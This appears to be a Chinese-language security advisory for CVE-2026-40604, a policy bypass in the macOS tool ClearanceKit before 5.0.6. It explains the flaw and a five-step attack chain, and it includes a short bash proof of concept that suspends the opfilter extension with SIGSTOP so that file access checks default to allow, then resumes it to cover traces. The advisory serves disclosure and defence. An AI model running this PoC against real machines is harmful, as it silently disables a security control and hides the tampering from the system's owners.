CVE-2026-40604 CVSS 4.4 中危

CVE-2026-40604: ClearanceKit安全策略绕过漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40604

漏洞类型

安全策略绕过

CVSS评分

4.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

ClearanceKit

漏洞概述

ClearanceKit是一款macOS文件访问控制工具。在5.0.6版本之前，其opfilter Endpoint Security系统扩展存在权限控制缺陷。任何具有root权限的进程可以向该扩展发送SIGSTOP信号将其挂起，或使用SIGKILL终止进程。当扩展被挂起时，所有授权请求超时并默认放行，导致ClearanceKit的文件访问策略执行被静默禁用，攻击者可借此绕过安全限制。

技术细节

该漏洞源于ClearanceKit的Endpoint Security系统扩展（Bundle ID: uk.craigbass.clearancekit.opfilter）未对信号处理进行足够的防护。在macOS系统中，尽管Endpoint Security框架设计用于强制执行策略，但扩展本身作为进程运行。在受影响版本中，任何拥有root权限的进程均可以向opfilter扩展发送SIGSTOP信号（通过kill -STOP）导致其暂停执行，或发送SIGKILL/SIGTERM直接终止。当opfilter被挂起时，它无法及时响应内核发送的AUTH（授权）事件。根据Endpoint Security的机制，如果客户端未响应，事件将超时并回退到默认操作。在ClearanceKit的配置中，默认操作为允许（ALLOW）。这意味着在扩展暂停期间，原本应被拦截的文件系统访问操作将被允许通过，从而完全绕过了ClearanceKit旨在执行的安全策略，直到扩展恢复或重启。

攻击链分析

STEP 1

获取Root权限

攻击者首先需要获取目标macOS系统的root权限，因为只有root用户才能向系统扩展发送控制信号。

STEP 2

定位目标进程

攻击者识别ClearanceKit的opfilter系统扩展对应的进程ID（PID）。

STEP 3

发送挂起信号

攻击者使用`kill -STOP <PID>`命令向目标进程发送SIGSTOP信号，强制暂停安全扩展的运行。

STEP 4

执行绕过攻击

在扩展暂停期间，攻击者执行原本被ClearanceKit策略禁止的文件访问操作（如读取、修改敏感文件）。由于扩展超时未响应，系统默认允许这些操作。

STEP 5

恢复运行（可选）

攻击者可以使用`kill -CONT <PID>`恢复进程运行，以掩盖攻击痕迹，使安全软件看似正常运行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-40604: ClearanceKit Bypass
# Description: Suspends the ClearanceKit opfilter process to bypass file access policies.
# Requirements: Root privileges on the target macOS machine.

TARGET_BUNDLE_ID="uk.craigbass.clearancekit.opfilter"

# Find the process ID for the opfilter extension
# Note: System extensions might run under different parent processes, searching by name or bundle ID
PID=$(pgrep -f "opfilter")

if [ -z "$PID" ]; then
    echo "[!] Target process not found. ClearanceKit might not be running."
    exit 1
fi

echo "[*] Found ClearanceKit opfilter PID: $PID"
echo "[*] Sending SIGSTOP to suspend the process..."

# Suspend the process
# This causes AUTH events to timeout, triggering the default 'ALLOW' action
sudo kill -STOP $PID

if [ $? -eq 0 ]; then
    echo "[+] Process suspended successfully. File access policies are now bypassed."
    echo "[!] You can now perform file operations that would normally be blocked."
    echo "[*] Press Enter to resume the process (mitigation)..."
    read 
    
    echo "[*] Sending SIGCONT to resume the process..."
    sudo kill -CONT $PID
    echo "[+] Process resumed."
else
    echo "[!] Failed to suspend process. Check permissions."
fi

影响范围

ClearanceKit < 5.0.6

防御指南

临时缓解措施

严格限制系统root权限的分配，防止恶意软件获取高权限。监控Endpoint Security系统扩展进程的异常终止或挂起行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表